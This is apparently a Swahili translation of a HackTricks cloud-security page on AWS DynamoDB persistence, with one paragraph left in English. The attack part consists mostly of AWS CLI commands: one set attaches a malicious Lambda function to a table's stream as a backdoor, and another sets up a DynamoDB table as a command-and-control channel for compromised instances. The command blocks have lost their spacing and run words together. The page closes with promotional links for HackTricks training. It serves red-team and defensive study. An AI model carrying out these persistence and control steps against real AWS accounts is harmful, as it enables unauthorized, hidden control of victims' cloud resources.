Kwa kutumia vitanzi vya DynamoDB, mkaidi anaweza kuunda nyuma ya mlango wa siri kwa kuunganisha kazi ya Lambda yenye nia mbaya na meza. Kazi ya Lambda inaweza kuzinduliwa wakati kipengee kinapoongezwa, kimebadilishwa, au kimefutwa, kuruhusu mkaidi kutekeleza nambari ya kupendelea ndani ya akaunti ya AWS.
# Create a malicious Lambda functionawslambdacreate-function \--function-name MaliciousFunction \--runtime nodejs14.x \--role <LAMBDA_ROLE_ARN> \--handler index.handler \--zip-file fileb://malicious_function.zip \--region <region># Associate the Lambda function with the DynamoDB table as a triggerawsdynamodbstreamsdescribe-stream \--table-name TargetTable \--region <region># Note the "StreamArn" from the outputawslambdacreate-event-source-mapping \--function-name MaliciousFunction \--event-source <STREAM_ARN> \--region <region>
Kudumisha uthabiti, mshambuliaji anaweza kuunda au kurekebisha vitu katika meza ya DynamoDB, ambayo itachochea kazi ya Lambda yenye nia mbaya. Hii inamruhusu mshambuliaji kutekeleza nambari ndani ya akaunti ya AWS bila mwingiliano moja kwa moja na kazi ya Lambda.
DynamoDB kama Kituo cha Udhibiti na Amri (C2)
Mshambuliaji anaweza kutumia meza ya DynamoDB kama kituo cha udhibiti na amri (C2) kwa kuunda vitu vinavyoleta amri na kutumia mifano iliyodukuliwa au kazi za Lambda kuchukua na kutekeleza amri hizi.
# Create a DynamoDB table for C2awsdynamodbcreate-table \--table-name C2Table \--attribute-definitions AttributeName=CommandId,AttributeType=S \--key-schema AttributeName=CommandId,KeyType=HASH \--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \--region <region># Insert a command into the tableawsdynamodbput-item \--table-name C2Table \--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \--region <region>
The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources.
<details><summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
